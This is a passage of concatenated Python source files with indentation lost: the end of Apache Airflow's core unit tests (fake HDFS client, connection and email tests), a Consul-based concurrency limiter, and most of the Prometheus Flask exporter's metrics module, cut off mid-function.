elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862, 'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook(object):
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class ConnectionTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
utils.db.initdb()
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:password@ec2.compute.com:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = models.Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:password@ec2.compute.com:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
def test_get_connections_db(self):
conns = BaseHook.get_connections(conn_id='airflow_db')
assert len(conns) == 1
assert conns[0].host == 'localhost'
assert conns[0].schema == 'airflow'
assert conns[0].login == 'root'
class WebHDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
HDFSHook = None
if six.PY2:
from airflow.hooks.hdfs_hook import HDFSHook
import snakebite
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = 'hdfs://localhost:8020'
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = models.Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
send_email_test = mock.Mock()
class EmailTest(unittest.TestCase):
def setUp(self):
configuration.conf.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
configuration.conf.set('email', 'EMAIL_BACKEND', 'tests.core.send_email_test')
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_charset='utf-8', mime_subtype='mixed')
self.assertFalse(mock_send_email.called)
class EmailSmtpTest(unittest.TestCase):
def setUp(self):
configuration.conf.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
filename = u'attachment; filename="' + os.path.basename(attachment.name) + '"'
self.assertEqual(filename, msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp_with_multibyte_content(self, mock_send_mime):
utils.email.send_email_smtp('to', 'subject', '🔥', mime_charset='utf-8')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
msg = call_args[2]
mimetext = MIMEText('🔥', 'mixed', 'utf-8')
self.assertEqual(mimetext.get_payload(), msg.get_payload()[0].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
configuration.conf.get('smtp', 'SMTP_USER'),
configuration.conf.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
configuration.conf.set('smtp', 'SMTP_SSL', 'True')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
configuration.conf.remove_option('smtp', 'SMTP_USER')
configuration.conf.remove_option('smtp', 'SMTP_PASSWORD')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
concurrency_limiter.py
|
import json
import logging
import threading
import consul
import os
from time import sleep, time
from contextlib import contextmanager
__author__ = 'quatrix'
@contextmanager
def ConcurrencyLimiterContext(name, limit, ttl=30, blocking=True, timeout=None):
c = ConcurrencyLimiter(name, limit, ttl)
try:
c.acquire(blocking, timeout)
yield
finally:
c.release()
class SemaphoreNodes(object):
def __init__(self, nodes, limit, lock_key, session_id):
self.nodes = nodes
self._limit = limit
self.lock_key = lock_key
self.session_id = session_id
@property
def contender_keys(self):
return set([v['Session'] for v in self.nodes if v['Key'] != self.lock_key])
@property
def lock_node(self):
try:
return [v for v in self.nodes if v['Key'] == self.lock_key][0]
except (TypeError, IndexError):
return None
@property
def semaphore(self):
if self.lock_node is None:
return None
semaphore = json.loads(self.lock_node['Value'])
semaphore['Holders'] = [holder for holder in semaphore['Holders'] if holder in self.contender_keys]
return semaphore
def get_modify_index(self):
if self.lock_node is None:
return 0
return self.lock_node['ModifyIndex']
@property
def holders(self):
if self.semaphore is None:
return []
return self.semaphore['Holders']
@property
def limit(self):
if self.semaphore is None:
return self._limit
return self.semaphore['Limit']
def create_new_lock_node(self):
return {
'Limit': self.limit,
'Holders': self.holders + [self.session_id]
}
def can_get_lock(self):
return len(self.holders) < self.limit
class ConcurrencyLimiter(object):
def __init__(self, name, limit, ttl=30):
self.name = name
self.limit = limit
self.ttl = ttl
consul_host = os.environ.get('CONSUL_HOST', '127.0.0.1')
consul_port = int(os.environ.get('CONSUL_PORT', '8500'))
logging.info('using consul host: %s port: %d', consul_host, consul_port)
self.consul = consul.Consul(host=consul_host, port=consul_port)
self.prefix_key = 'service/{name}/lock/'.format(name=self.name)
self.lock_key = '{prefix}.lock'.format(prefix=self.prefix_key)
def get_session_id(self):
if not hasattr(self, '_session'):
self._session = self.consul.session.create(name=self.name, ttl=self.ttl, behavior='delete')
return self._session
def create_contender_key(self):
return self.consul.kv.put(
'{prefix}{session}'.format(
prefix=self.prefix_key,
session=self.get_session_id()
),
self.name,
acquire=self.get_session_id()
)
def get_semaphore_nodes(self):
return SemaphoreNodes(
nodes=self.consul.kv.get(self.prefix_key, recurse=True)[1],
limit=self.limit,
lock_key=self.lock_key,
session_id=self.get_session_id(),
)
def create_lock_node(self, lock_node, modify_index):
return self.consul.kv.put(
key=self.lock_key,
value=json.dumps(lock_node),
cas=modify_index,
)
def get_lock(self):
semaphore_nodes = self.get_semaphore_nodes()
if not semaphore_nodes.can_get_lock():
return False
return self.create_lock_node(
lock_node=semaphore_nodes.create_new_lock_node(),
modify_index=semaphore_nodes.get_modify_index(),
)
def keep_alive(self):
last_renew_time = time()
while not self._stop_keep_alive.wait(timeout=0.1):
if time() - last_renew_time > (self.ttl - 5):
self.consul.session.renew(self.get_session_id())
last_renew_time = time()
def start_keep_alive(self):
self.keep_alive_thread = threading.Thread(target=self.keep_alive)
self.keep_alive_thread.daemon = True
self._stop_keep_alive = threading.Event()
self.keep_alive_thread.start()
def stop_keep_alive(self):
logging.info('setting stop keep alive')
self._stop_keep_alive.set()
self.keep_alive_thread.join()
def acquire(self, blocking=True, timeout=None):
logging.info('trying to get lock for %s (limit=%d)', self.name, self.limit)
if not self.create_contender_key():
raise RuntimeError('can\'t create contender_key')
if blocking:
self.start_keep_alive()
t0 = time()
while not self.get_lock():
if timeout is not None and time() - t0 > timeout:
raise RuntimeError('timeout while trying to get lock')
logging.info('trying to get lock')
sleep(1)
else:
logging.info('trying to get lock')
if not self.get_lock():
raise RuntimeError('can\'t get lock')
self.start_keep_alive()
logging.info('got lock')
def release(self):
logging.info('releasing lock')
self.stop_keep_alive()
self.consul.session.destroy(self.get_session_id())
|
__init__.py
|
import os
import re
import sys
import inspect
import warnings
import functools
import threading
from http import HTTPStatus
from timeit import default_timer
from flask import request, make_response, current_app
from flask import Flask, Response
from flask.views import MethodViewType
from werkzeug.serving import is_running_from_reloader
from prometheus_client import Counter, Histogram, Gauge, Summary
from prometheus_client import generate_latest, CONTENT_TYPE_LATEST
if sys.version_info[0:2] >= (3, 4):
# Python v3.4+ has a built-in has __wrapped__ attribute
wraps = functools.wraps
else:
# in previous Python version we have to set the missing attribute
def wraps(wrapped, assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
def wrapper(f):
f = functools.wraps(wrapped, assigned, updated)(f)
f.__wrapped__ = wrapped
return f
return wrapper
NO_PREFIX = '#no_prefix'
"""
Constant indicating that default metrics should not have any prefix applied.
It purposely uses invalid characters defined for metrics names as specified in Prometheus
documentation (see: https://prometheus.io/docs/concepts/data_model/#metric-names-and-labels)
"""
class PrometheusMetrics(object):
"""
Prometheus metrics export configuration for Flask.
The default metrics include a Histogram for HTTP request latencies
and number of HTTP requests plus a Counter for the total number
of HTTP requests.
Sample usage:
app = Flask(__name__)
metrics = PrometheusMetrics(app)
# static information as metric
metrics.info('app_info', 'Application info', version='1.0.3')
@app.route('/')
def main():
pass # requests tracked by default
@app.route('/skip')
@metrics.do_not_track()
def skip():
pass # default metrics are not collected
@app.route('/<item_type>')
@metrics.do_not_track()
@metrics.counter('invocation_by_type', 'Number of invocations by type',
labels={'item_type': lambda: request.view_args['type']})
def by_type(item_type):
pass # only the counter is collected, not the default metrics
@app.route('/long-running')
@metrics.gauge('in_progress', 'Long running requests in progress')
def long_running():
pass
@app.route('/status/<int:status>')
@metrics.do_not_track()
@metrics.summary('requests_by_status', 'Request latencies by status',
labels={'status': lambda r: r.status_code})
@metrics.histogram('requests_by_status_and_path', 'Request latencies by status and path',
labels={'status': lambda r: r.status_code, 'path': lambda: request.path})
def echo_status(status):
return 'Status: %s' % status, status
Label values can be defined as callables:
- With a single argument that will be the Flask Response object
- Without an argument, possibly to use with the Flask `request` object
"""
def __init__(self, app, path='/metrics',
export_defaults=True, defaults_prefix='flask',
group_by='path', buckets=None, static_labels=None,
excluded_paths=None, registry=None, **kwargs):
"""
Create a new Prometheus metrics export configuration.
:param app: the Flask application
:param path: the metrics path (defaults to `/metrics`)
:param export_defaults: expose all HTTP request latencies
and number of HTTP requests
:param defaults_prefix: string to prefix the default exported
metrics name with (when either `export_defaults=True` or
`export_defaults(..)` is called) or in case you don't want
any prefix then use `NO_PREFIX` constant
:param group_by: group default HTTP metrics by
this request property, like `path`, `endpoint`, `url_rule`, etc.
(defaults to `path`)
:param buckets: the time buckets for request latencies
(will use the default when `None`)
:param static_labels: static labels to attach to each of the
metrics exposed by this `PrometheusMetrics` instance
:param excluded_paths: regular expression(s) as a string or
a list of strings for paths to exclude from tracking
:param registry: the Prometheus Registry to use
"""
self.app = app
self.path = path
self._export_defaults = export_defaults
self._defaults_prefix = defaults_prefix or 'flask'
self._static_labels = static_labels or {}
self.buckets = buckets
self.version = __version__
if registry:
self.registry = registry
else:
# load the default registry from the underlying
# Prometheus library here for easier unit testing
# see https://github.com/rycus86/prometheus_flask_exporter/pull/20
from prometheus_client import REGISTRY as DEFAULT_REGISTRY
self.registry = DEFAULT_REGISTRY
if kwargs.get('group_by_endpoint') is True:
warnings.warn(
'The `group_by_endpoint` argument of `PrometheusMetrics` is '
'deprecated since 0.4.0, please use the '
'new `group_by` argument.', DeprecationWarning
)
self.group_by = 'endpoint'
elif group_by:
self.group_by = group_by
else:
self.group_by = 'path'
if excluded_paths:
if PrometheusMetrics._is_string(excluded_paths):
excluded_paths = [excluded_paths]
self.excluded_paths = [
re.compile(p) for p in excluded_paths
]
else:
self.excluded_paths = None
if app is not None:
self.init_app(app)
def init_app(self, app):
"""
This callback can be used to initialize an application for the
use with this prometheus reporter setup.
This is usually used with a flask "app factory" configuration. Please
see: http://flask.pocoo.org/docs/1.0/patterns/appfactories/
Note, that you need to use `PrometheusMetrics(app=None, ...)`
for this mode, otherwise it is called automatically.
:param app: the Flask application
"""
if self.path:
self.register_endpoint(self.path, app)
if self._export_defaults:
self.export_defaults(
self.buckets, self.group_by,
self._defaults_prefix, app
)
def register_endpoint(self, path, app=None):
"""
Register the metrics endpoint on the Flask application.
:param path: the path of the endpoint
:param app: the Flask application to register the endpoint on
(by default it is the application registered with this class)
"""
if is_running_from_reloader() and not os.environ.get('DEBUG_METRICS'):
return
if app is None:
app = self.app or current_app
@app.route(path)
@self.do_not_track()
def prometheus_metrics():
# import these here so they don't clash with our own multiprocess module
from prometheus_client import multiprocess, CollectorRegistry
if 'prometheus_multiproc_dir' in os.environ:
registry = CollectorRegistry()
else:
registry = self.registry
if 'name[]' in request.args:
registry = registry.restricted_registry(request.args.getlist('name[]'))
if 'prometheus_multiproc_dir' in os.environ:
multiprocess.MultiProcessCollector(registry)
headers = {'Content-Type': CONTENT_TYPE_LATEST}
return generate_latest(registry), 200, headers
def start_http_server(self, port, host='0.0.0.0', endpoint='/metrics'):
"""
Start an HTTP server for exposing the metrics.
This will be an individual Flask application,
not the one registered with this class.
:param port: the HTTP port to expose the metrics endpoint on
:param host: the HTTP host to listen on (default: `0.0.0.0`)
:param endpoint: the URL path to expose the endpoint on
(default: `/metrics`)
"""
if is_running_from_reloader():
return
app = Flask('prometheus-flask-exporter-%d' % port)
self.register_endpoint(endpoint, app)
def run_app():
app.run(host=host, port=port)
thread = threading.Thread(target=run_app)
thread.setDaemon(True)
thread.start()
def export_defaults(self, buckets=None, group_by='path',
prefix='flask', app=None, **kwargs):
"""
Export the default metrics:
- HTTP request latencies
- Number of HTTP requests
:param buckets: the time buckets for request latencies
(will use the default when `None`)
:param group_by: group default HTTP metrics by
this request property, like `path`, `endpoint`, `rule`, etc.
(defaults to `path`)
:param prefix: prefix to start the default metrics names with
or `NO_PREFIX` (to skip prefix)
:param app: the Flask application
"""
if app is None:
app = self.app or current_app
if not prefix:
prefix = self._defaults_prefix or 'flask'
# use the default buckets from prometheus_client if not given here
buckets_as_kwargs = {}
if buckets is not None:
buckets_as_kwargs['buckets'] = buckets
if kwargs.get('group_by_endpoint') is True:
warnings.warn(
'The `group_by_endpoint` argument of '
'`PrometheusMetrics.export_defaults` is deprecated since 0.4.0, '
'please use the new `group_by` argument.', DeprecationWarning
)
duration_group = 'endpoint'
elif group_by:
duration_group = group_by
else:
duration_group = 'path'
if callable(duration_group):
duration_group_name = duration_group.__name__
else:
duration_group_name = duration_group
if prefix == NO_PREFIX:
prefix = ""
else:
prefix = prefix + "_"
additional_labels = self._static_labels.items()
histogram = Histogram(
'%shttp_request_duration_seconds' % prefix,
'Flask HTTP request duration in seconds',
('method', duration_group_name, 'status') + tuple(map(lambda kv: kv[0], additional_labels)),
registry=self.registry,
**buckets_as_kwargs
)
counter = Counter(
'%shttp_request_total' % prefix,
'Total number of HTTP requests',
('method', 'status') + tuple(map(lambda kv: kv[0], additional_labels)),
registry=self.registry
)
self.info(
'%sexporter_info' % prefix,
'Information about the Prometheus Flask exporter',
version=self.version, **self._static_labels
)
def before_request():
request.prom_start_time = default_timer()
def after_request(response):
if hasattr(request, 'prom_do_not_track') or hasattr(request, 'prom_exclude_all'):
return response
if self.excluded_paths:
if any(pattern.match(request.path) for pattern in self.excluded_paths):
return response
if isinstance(response.status_code, HTTPStatus):
status_code = response.status_code.value
else:
status_code = response.status_code
if hasattr(request, 'prom_start_time'):
total_time = max(default_timer() - request.prom_start_time, 0)
if callable(duration_group):
group = duration_group(request)
else:
group = getattr(request, duration_group)
histogram.labels(
request.method, group, status_code,
*map(lambda kv: kv[1], additional_labels)
).observe(total_time)
counter.labels(
request.method, status_code,
*map(lambda kv: kv[1], additional_labels)
).inc()
return response
def teardown_request(exception=None):
if not exception or hasattr(request, 'prom_do_not_track') or hasattr(request, 'prom_exclude_all'):
return
if self.excluded_paths:
if any(pattern.match(request.path) for pattern in self.excluded_paths):
return
if hasattr(request, 'prom_start_time'):
total_time = max(default_timer() - request.prom_start_time, 0)
if callable(duration_group):
group = duration_group(request)
else:
group = getattr(request, duration_group)
histogram.labels(
request.method, group, 500,
*map(lambda kv: kv[1], additional_labels)
).observe(total_time)
counter.labels(
request.method, 500,
*map(lambda kv: kv[1], additional_labels)
).inc()
return
app.before_request(before_request)
app.after_request(after_request)
app.teardown_request(teardown_request)
def register_default(self, *metric_wrappers, **kwargs):
"""
Registers metric wrappers to track all endpoints,
similar to `export_defaults` but with user defined metrics.
Call this function after all routes have been set up.
Use the metric wrappers as arguments:
- metrics.counter(..)
- metrics.gauge(..)
- metrics.summary(..)
- metrics.histogram(..)
:param metric_wrappers: one or more metric wrappers to register
for all available endpoints
:param app: the Flask application to register the default metric for
(by default it is the application registered with this class)
"""
app = kwargs.get('app')
if app is None:
app = self.app or current_app
for endpoint, view_func in app.view_functions.items():
for wrapper in metric_wrappers:
view_func = wrapper(view_func)
app.view_functions[endpoint] = view_func
def histogram(self, name, description, labels=None, **kwargs):
"""
Use a Histogram to track the execution time and invocation count
of the method.
:param name: the name of the metric
:param description: the description of the metric
:param labels: a dictionary of `{labelname: callable_or_value}` for labels
:param kwargs: additional keyword arguments for creating the Histogram
"""
return self._track(
Histogram,
lambda metric, time: metric.observe(time),
kwargs, name, description, labels,
registry=self.registry
)
def summary(self, name, description, labels=None, **kwargs):
"""
Use a Summary to track the execution time and invocation count
of the method.
:param name: the name of the metric
:param description: the description of the metric
:param labels: a dictionary of `{labelname: callable_or_value}` for labels
:param kwargs: additional keyword arguments for creating the Summary
"""
return self._track(
Summary,
lambda metric, time: metric.observe(time),
kwargs, name, description, labels,
registry=self.registry
)
def gauge(self, name, description, labels=None, **kwargs):
"""
Use a Gauge to track the number of invocations in progress
for the method.
:param name: the name of the metric
:param description: the description of the metric
:param labels: a dictionary of `{labelname: callable_or_value}` for labels
:param kwargs: additional keyword arguments for creating the Gauge
"""
return self._track(
Gauge,
lambda metric, time: metric.dec(),
kwargs, name, description, labels,
registry=self.registry,
before=lambda metric: metric.inc(),
revert_when_not_tracked=lambda metric: metric.dec()
)
def counter(self, name, description, labels=None, **kwargs):
"""
Use a Counter to track the total number of invocations of the method.
:param name: the name of the metric
:param description: the description of the metric
:param labels: a dictionary of `{labelname: callable_or_value}` for labels
:param kwargs: additional keyword arguments for creating the Counter
"""
return self._track(
Counter,
lambda metric, time: metric.inc(),
kwargs, name, description, labels,
registry=self.registry
)
def _track(self, metric_type, metric_call, metric_kwargs, name, description, labels,
registry, before=None, revert_when_not_tracked=None):
"""
Internal method decorator logic.
:param metric_type: the type of the metric from the `prometheus_client` library
:param metric_call: the invocation to execute as a callable with `(metric, time)`
:param metric_kwargs: additional keyword arguments for creating the metric
:param name: the name of the metric
:param description: the description of the metric
:param labels: a dictionary of `{labelname: callable_or_value}` for labels
:param registry: the Prometheus Registry to use
:param before: an optional callable to invoke before executing the
request handler method accepting the single `metric` argument
:param revert_when_not_tracked: an optional callable to invoke when
a non-tracked endpoint is being handled to undo any actions already
done on it, accepts a single `metric` argument
"""
if labels is not None and not isinstance(labels, dict):
raise TypeError('labels needs to be a dictionary of {labelname: callable}')
if self._static_labels:
if not labels:
labels = self._static_labels
else:
# merge the default labels and the specific ones for this metric
combined = dict()
combined.update(self._static_labels)
combined.update(labels)
labels = combined
label_names = labels.keys() if labels else tuple()
parent_metric = metric_type(
name, description, labelnames=label_names, registry=registry,
**metric_kwargs
)
def argspec(func):
if hasattr(inspect, 'getfullargspec'):
return inspect.getfullargspec(func)
else:
return inspect.getargspec(func)
def label_value(f):
if not callable(f):
return lambda x: f
if argspec(f).args:
return lambda x: f(x)
else:
return lambda x: f()
label_generator = tuple(
(key, label_value(call))
for key, call in labels.items()
) if labels else tuple()
def get_metric(response):
if label_names:
return parent_metric.labels(
**{key: call(response) for key, call in label_generator}
)
else:
return parent_metric
def decorator(f):
@wraps(f)
def func(*args, **kwargs):
if before:
metric = get_metric(None)
before(metric)
else:
metric = None
exception = None
start_time = default_timer()
try:
try:
# execute the handler function
response = f(*args, **kwargs)
except Exception as ex:
# let Flask decide to wrap or reraise the Exception
response = current_app.handle_user_exception(ex)
except Exception as ex:
# if it was re-raised, treat it as an InternalServerError
exception = ex
response = make_response('Exception: %s' % ex, 500)
if hasattr(request, 'prom_exclude_all'):
if metric and revert_when_not_tracked:
# special handling for Gauge metrics
revert_when_not_tracked(metric)
return response
total_time = max(default_timer() - start_time, 0)
if not metric:
if not isinstance(response, Response) and request.endpoint:
view_func = current_app.view_functions[request.endpoint]
# There may be decorators 'above' us,
# but before the function is registered with Flask
while view_func and view_func != f:
try:
view_func = view_func.__wrapped__
except AttributeError:
break
if view_func == f:
# we are in a request handler method
response = make_response(response)
elif hasattr(view_func, 'view_class') and isinstance(view_func.view_class, MethodViewType):
# we are in a method view (for Flask-RESTful for example)
response = make_response(response)
metric = get_metric(response)
metric_call(metric, time=total_time)
if exception:
try:
# re-raise for the Flask error handler
raise exception
except Exception as ex:
return current_app.handle_user_exception(ex)
else:
return response
return func
return decorator
@staticmethod
def do_not_track():
"""
Decorator to skip the default metrics collection for the method.
*Note*: explicit metrics decorators will still collect the data
"""
def decorator(f):
